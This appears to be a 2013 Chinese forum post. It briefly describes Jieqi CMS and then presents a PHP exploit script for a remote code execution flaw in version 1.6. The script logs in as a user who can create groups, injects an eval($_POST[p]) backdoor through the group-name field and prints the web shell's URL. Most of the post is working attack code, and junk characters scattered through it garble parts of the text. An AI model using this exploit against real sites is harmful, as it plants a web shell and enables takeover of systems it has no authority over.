杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
3 a' L4 y7 [9 `% M( M$ w: R1 i6 h" O& t. h
! B, |. g) B! V该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。' F) F0 L: V! ~. h' G0 j
需要有一个能创建圈子的用户。
* _* a5 J( J+ ?2 a
8 J5 [$ H8 V. x1 _/ e<?php
' u, Q; Y9 P) S7 G+ ]
( R% C* G2 K7 |1 vprint_r('
8 @* h* x) ~" G: _+---------------------------------------------------------------------------+
% [% U5 F4 `1 Y3 u! L+ pJieqi CMS V1.6 PHP Code Injection Exploit
G( b1 ~3 g: i* p( K( I: I7 e! Hby flyh4t
& P7 a$ C* g! e e2 ^mail: phpsec at hotmail dot com
9 p/ z8 e: h, T% V1 {5 u9 t( Yteam: http://www.wolvez.org. s" p/ Y) }' f8 T, c- R2 J
+---------------------------------------------------------------------------+
2 i+ ~8 W5 C& n6 c" ^" W9 x' ]'); /**
# m5 _' ^$ j" h$ Z# R( g6 V/ g+ l$ j6 t * works regardless of php.ini settings
, s$ G& |" r% J$ n- p4 X% a*/ if ($argc < 5) { print_r('
: y4 |5 E( ~$ Q9 e1 E3 k# E( G( g+---------------------------------------------------------------------------+0 x- Q6 a! N" l8 I/ n! q4 u
Usage: php '.$argv[0].' host path username
+ M9 [" Y! `; E2 l8 D$ }+ Lhost: target server (ip/hostname)7 \5 [1 R# Q" z# m% z
path: path to jieqicms + ~& s1 P2 U4 H" H1 m: T
uasename: a username who can create group
# q f% S; Y) _Example:
$ I" b: n( @2 p& T) d) n1 w6 ^: Jphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password) @ J: v$ n( w# Q! L
+---------------------------------------------------------------------------+
" K! B; a5 T [" X) q* U3 W'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961% `* {1 G/ i6 V4 {
Content-Disposition: form-data; name="gname"
5 H; Z$ d, h% r4 k) g \& @ . N; e7 d. c2 `! i/ k7 _# f
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
# O1 L6 ~1 [# ~5 X: L# O7 O( ]& x4 V% \-----------------------------23281168279961
5 S9 U4 C* ?- c; ]8 y$ D$ OContent-Disposition: form-data; name="gcatid"0 l1 l# a7 C7 W# K8 {
" p" j3 U$ C# X G; A7 o
1# ?& _& D3 l: u
-----------------------------23281168279961
) D# ^7 ^) i' Q7 B9 gContent-Disposition: form-data; name="gaudit"
: Q0 S1 W- w! g8 n2 v! W: G
# b R4 S( g; R) l# I/ g% t1
- g6 b$ R' O% `$ j$ m-----------------------------232811682799617 Z( t8 Q) e0 A/ R p
Content-Disposition: form-data; name="gbrief"
; A% h$ }, k& v5 S, y# }0 Q) g
" I6 ?2 e% t' u1
5 {( l8 h; P) y. M-----------------------------23281168279961--
5 }/ I* y) @' R+ g& y" }5 k `8 w'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
2 n& G- H2 c: ? - c& L. A+ | v+ c& r+ o6 I
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对